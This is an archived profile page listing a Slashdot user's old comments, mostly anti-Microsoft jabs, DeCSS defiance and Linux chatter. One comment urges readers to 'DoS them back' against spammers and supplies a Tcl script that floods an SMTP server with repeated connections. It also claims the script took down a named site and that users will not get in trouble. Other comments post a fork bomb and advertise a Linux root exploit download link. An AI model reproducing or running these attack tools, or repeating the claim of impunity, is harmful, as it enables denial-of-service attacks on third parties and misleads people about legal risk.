Slashdot Mirror


User: linuxgod

linuxgod's activity in the archive.

Stories
0
Comments
243
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 243

  1. Re:Predictions on Hotmail about to collapse under load · · Score: 1

    As the words of Dr. Evil, Riiiiiight.

    Thats why most of the net runs Apache for web-servers, and the other half runs sendmail/sendmail-clone or some other *nix based
    mail servers. M$ has no place in the server market because they just can't do it. Their badly coded crap can't handle the load.

  2. Hell, run a .... on IBM's $45 Linux Server (Well, Kinda) · · Score: 1

    Hell, run a Crey. :-)
    MSstate.edu has a crey, over 600 users and hardly a load. Old? ya, whatever d00d. it STILL will outperform any of the most modern highest end servers now. Load 14000 linuxs' up on it !!!! kick ass.

  3. hehe on Sys-Admin Appreciation Day Tomorrow · · Score: 1

    M$ Sysadmins don't need crap. Chimps get paid to click buttons at NASA. Maybe we should give the M$ sysadmins banannas.

  4. No, they don't need it. on Sys-Admin Appreciation Day Tomorrow · · Score: 1

    No, they don't need anything. A monkey could get paid for clicking buttons all day. Chimps get paid to do that at NASA.

  5. I hate that on Advertisers Agree To Privacy Restrictions - Kinda · · Score: 1

    I hate that site, thats why iv firewalled off
    doubleclick.net from my LAN. Keeps a lot of
    those annoying spammers out too.

  6. found here on Napster Shut Down Until Trial · · Score: 1

    http://www.linuxgod.net/ and http://ws.linuxgod.net/ DeCSS WILL stay around.

  7. DOS them on When Does Spam Equal "Denial of Service"? · · Score: 1

    DoS them Back. Try this. BTW, you think you will get in trouble for it? you won't. Take my word for it, i do this all the time from my machine. It runs on TCL. I made this a few months ago.
    It took Anticlan.com's ftp server down. Ya, it
    hits HARD. Hangs the mail server sending it.
    Works on sendmail, and most others. This is for
    anyone having trouble with spammers. Save this
    in file and do 'tcl file', or 'tclsh file'.

    --------------------CUT HERE------------------

    set flood_count 2000
    set curr_count 30

    proc do_port { host port } {
    puts stdout "Flooding $host:$port ..."
    if {![catch {socket $host $port} sockfd]} {
    puts stdout "CONNECTED.. "
    puts stdout "SENDING SHIT.. "

    puts $sockfd "ETRN x"

    puts stdout "DONE!"
    } else {
    puts stdout "FAILED."
    }
    }

    while {$curr_count < $flood_count} {
    set curr_count [expr $curr_count + 1]
    do_port server 25
    }

    ----------------UNCUT HERE------------------

  8. Screw MPAA on MPAA v. 2600 NY Trial Has Ended · · Score: 1

    To hell with MPAA, im keeping DeCSS up on my site.
    I hope they contact me. I have a few things to say to them.

  9. Its a Sony! on Sony Announces GScube Development System · · Score: 1

    Its a Sony!

  10. Re:Actually it looks like an ASCI art Penguin on Geek Flavor · · Score: 1

    Me2, HAHAH, im gonna save that big penguin.
    thats cool.

    hell, someone open that box up, i need to
    do a ping -f x.x.x.x to someone.

    if anyone is interested I have a root
    exploit for linux <= 2.2.15 on my. 2ndary site.
    requires sendmail, but you can compile that yourself.

    http://www.futuresouth.com/~linuxgod/exploits/

  11. 1 word. fork() on Geek Flavor · · Score: 1

    1 word. fork().

    --------- CUT HERE --------

    int main()
    {
    while(1);
    {
    {
    fork()
    }
    }

    -------- UNCUT HERE ------

  12. My Copy on Civil Disobedience and DeCSS · · Score: 1

    You can find my copy on my main site/page at http://www.linuxgod.net.

    If I puchase, buy, or get somthing for free I WILL do what I want to with it reguardless of what ANY corporation or government says, and I hope some company emails me about it because they will get a reply they won't like.

  13. HAHA, Figures. on Report Of New Outlook Exploit · · Score: 1

    It figures, Microsoft can't really make a decent prduct much less make it secure. I can only imagine how many buffer overflows you will see when M$ releases their source. GO DOJ !!!!!

  14. Re:Why not use a good OS? i.e. NOT Linux but Windo on Linux Announcement from Sony, Toshiba, NEC, Fujitsu · · Score: 1

    Oh lord, M$ on a cell phone? Dial a number and the phone BlueScreens. :-) I don't want a cellphone that crashes.

  15. The name fits M$ on Linux Announcement from Sony, Toshiba, NEC, Fujitsu · · Score: 1

    The name fits you. Anonymous Coward. MUAHAHA. Sorry, i don't want to pay for somthing when i can get a better OS for free.

  16. We've seen this b4. on Linux Announcement from Sony, Toshiba, NEC, Fujitsu · · Score: 1

    Some of us have probably seen this b4. Correct me if im wrong, but wasn't there a later version of the N64 running Linux? There are a few devices out there already running Linux, you maynot even know about them. Some of the GMC cars use a embeded *nix OS (not sure which ones, or which OS). The overall idea is good. But don't forget, this is not going to be a cellphone that boots up and you see lilo.

  17. kernel 2.2.11, im the first to install on Linux 2.2.11 Released · · Score: 1

    kernel 2.2.11 is running on both linuxgod.net and ws2.linuxgod.net. After 1 hour of screwing around i finally got the damn thing to compile my custom work for ATAPI/SCSI emulation. If you download it, download from ftp://ftp.us.kernel.org. I got a pretty fast download off a 56k taking 33 minutes of my wasted free time. http://www.linuxgod.net ( if im online )

  18. Unreal on Unreal Tournament Linux Client · · Score: 1

    Will this new version of UnrealUT support 3dfx cards such as the new Voodoo3 2000 pci? jd@linuxgod.net